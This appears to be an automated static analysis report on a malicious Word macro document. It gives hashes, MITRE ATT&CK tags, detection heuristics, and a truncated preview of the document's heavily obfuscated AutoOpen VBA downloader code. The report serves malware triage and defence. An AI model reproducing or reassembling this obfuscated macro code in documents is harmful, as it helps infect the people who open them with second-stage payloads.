Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fe935b77ccc4185a…

MALICIOUS

Office (OLE)

206.0 KB Created: 2018-03-06 14:35:00 Authoring application: Microsoft Office Word First seen: 2018-08-05
MD5: 90525bb38aa3890cf0092a5ae3b2ce13 SHA-1: 3651c470cc5a9c7088cdcafd33f8fd42cf8d9960 SHA-256: fe935b77ccc4185ab74b2aa7780dd0f922431f3292d346c8a0a9e9bfb7da1e4c
164 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The 'AutoOpen' macro is present and uses 'CreateObject' to execute code, indicating an attempt to download and run a second-stage payload. The macro code is heavily obfuscated, making it difficult to determine the exact download URL or payload, but the presence of the 'macros.bas' artifact suggests a typical macro-based attack.

Heuristics 7

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 71989 bytes
SHA-256: 970c6a98008cc16e786b455ad1ff7afb89ffe63ee697dc8cab6a6b3e872d0fcb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 22 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UjwftfzdTPPR"
Function LfzAFLnJ()
On Error Resume Next
VKKcN = "EAJBmLAEKqNiiuAJtlQLmav%!!%4rav%!!%3raMAjPFhktMYBTQJSi"
XzvBcjn = 6314454 / Atn(HdOiNwzL) / (9677584 - KwimEwzXKUif / 4673935 - Sqr(jMCIiPtbj * CStr(EMTKlabImiY / Sgn(754915 - CDate(1033341 / UFEaiMlcE * 7881080 * Sqr(AtohitjOwircmm))))) + (tatqBcHjnYL - 3728119 / 8630970 / CLng(4484362)))
BEzvbjN = 9586015 / Atn(HiMkjmaDpo) / (7989198 - nddRow / 3643600 - Sqr(jOnWtNA * CStr(XZqrBG / Sgn(6857935 - CDate(9549869 / BDGzpBMmBs * 2038429 * Sqr(tfuEmssrqqSlSf))))) + (wwFjtfr - 7384925 / 9062140 / CLng(2307032)))
pCbvdDPVLp = PQtWwbTzNFLtqb + dd333h3sd(VKKcN, 17, 17)
NQOtswoRwJ = "UvmSYzSbSP !%6Vfjaz"
XfYkUPYTzV = 8221165 / Atn(RoBwPDCLCpWJbS) / (970778 - DFridOXQ / 766984 - Sqr(LBSrQLFikI * CStr(qwIoRKzDRjwGL / Sgn(293673 - CDate(7594822 / ISCQlsosA * 8744770 * Sqr(ZKDwiwY))))) + (GjuMEaM - 7478110 / 9077490 / CLng(2478157)))
PQRODs = 9035151 / Atn(pcozMi) / (8438424 - wKPnXz / 4571060 - Sqr(NkQKmpjnNFzpY * CStr(sfFmUw / Sgn(4315913 - CDate(1146457 / zERNwTHoEDT * 4892123 * Sqr(wkVAwBj))))) + (kBisRk - 6398894 / 7248593 / CLng(5968349)))
pzlwMsLP = tNbjsUq + dd333h3sd(NQOtswoRwJ, 6, 4)
WBzPKvQij = "frABZPrQTaBwriidWZHKhcjoLsoz"
koLXwl = 2821215 / Atn(HvwcXEVw) / (2285294 - WERmMskcPhwIES / 6097152 - Sqr(JMhkW * CStr(BajsvKA / Sgn(6764573 - CDate(6705707 / kjrdzP * 6681071 * Sqr(CCMhVzqiwSuJ))))) + (bcIDqFUw - 4923752 / 5333525 / CLng(6240665)))
LMcTrfRXSXP = 9673407 / Atn(XYbCHudtiTBU) / (1050407 - BROhoZsIDja / 1271832 - Sqr(Oqcbjj * CStr(bSDuLAjXsIG / Sgn(6771883 - CDate(7148657 / SfKtrZwOU * 8381436 * Sqr(BlPDFsVkZE))))) + (OUWosVQvcrV - 6875773 / 9204270 / CLng(2230716)))
siAwqj = WHAQFUbjUG + dd333h3sd(WBzPKvQij, 3, 2)
LYOkiBYNuaB = "LZOfcRCbLDETSKjECCrElbu"
RqkhKR = 7402584 / Atn(wMBzwi) / (5738441 - GViLdYd / 5049276 - Sqr(UnmNhnzFZjrf * CStr(oIarjmDGa / Sgn(7596278 - CDate(9814868 / GScSaCsTkXiA * 8748681 * Sqr(YBrXBmi))))) + (jZlmsqWjuAn - 4767505 / 5226698 / CLng(4089611)))
oORzwSUaclq = 4537036 / Atn(ziwMoRaazROC) / (2996121 - lMJYl / 530477 - Sqr(nKCzEdiNUnD * CStr(EXXnStPzKp / Sgn(5157400 - CDate(5428669 / QqOaOCjU * 1121411 * Sqr(UwPkosN))))) + (iKZLfOZrfW - 649744 / 4412630 / CLng(9616922)))
WqZcScQCj = hoKjMwLS + dd333h3sd(LYOkiBYNuaB, 5, 1)
fnDLRFQn = "bYsjJYT=EOtn"
RrqLkd = 810592 / Atn(pijZwVtNWKVM) / (639141 - ihDqkfUwNpVGVT / 1594655 - Sqr(zAiiAYr * CStr(tWvFNq / Sgn(9170151 - CDate(1641480 / jPfzYo * 4735376 * Sqr(qRtDrzZE))))) + (NVhVvJ - 8035059 / 9704955 / CLng(9305836)))
EHCqrovPrAI = 2787224 / Atn(OkWtNApDcOYL) / (1211564 - JHzBCWV / 92464 - Sqr(daakkF * CStr(BcaoFGvzqrJVc / Sgn(8767198 - CDate(7836489 / bHmCrwu * 8444048 * Sqr(OitTmPE))))) + (mNvkSICMzLKMzY - 2362069 / 7832198 / CLng(3001038)))
svGcESLo = adnmTmFlUIw + dd333h3sd(fnDLRFQn, 5, 1)
wCwjvDHWi = "HmcmwjTSHiAAi% tes&&s=%jzN"
siYIzGPLMaw = 2508730 / Atn(suJzjHRSYzGjc) / (8486826 - fXuXoNRhGuOkPY / 6464233 - Sqr(sTljEOnW * CStr(rwZJlBIvQT / Sgn(2285318 - CDate(4029016 / YcbNCEUXBtrjN * 2545587 * Sqr(ItRjYszRrXVsG))))) + (wFVwzuJHrMiC - 1408768 / 8033190 / CLng(478906)))
UzKRVsLpMz = 6604188 / Atn(XoSmWCcwza) / (2173377 - qhLOjCoVjOS / 6361868 - Sqr(CEAVl * CStr(OJuzEn / Sgn(229749 - CDate(5465185 / tzzTz * 4481930 * Sqr(fWoYn))))) + (MtJWllT - 9515986 / 5377694 / CLng(5277720)))
auVWPkwPK = dwDzEiiZrcBjDb + dd333h3sd(wCwjvDHWi, 4, 10)
SUvZkiz = "FzSnJE tjloilnw"
jLUHGDw = 9918871 / Atn(nXvwZwRaUZVu) / (6914098 - drZSEDPZJ / 5234206 - Sqr(sitvcPmiZjzMXm * CStr(bjijUniEHKjzF / Sgn(9268131 - CDate(4930121 / NTBhOYi * 8521220 * Sqr(jQKtdi))))) + (jKcfv - 5120914 / 1288006 / CLng(1893540)))
iIZhcinmSbi = 1746673 / Atn(llwQhhzSms) / (4287526 - fCFmZ / 7175952 - Sqr(YKijfTvUt * CStr(nNrYkmtw / Sgn(8726498 - CDate(336260 / LbrlibiZaIB * 4112053 * Sqr(lTHFQ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.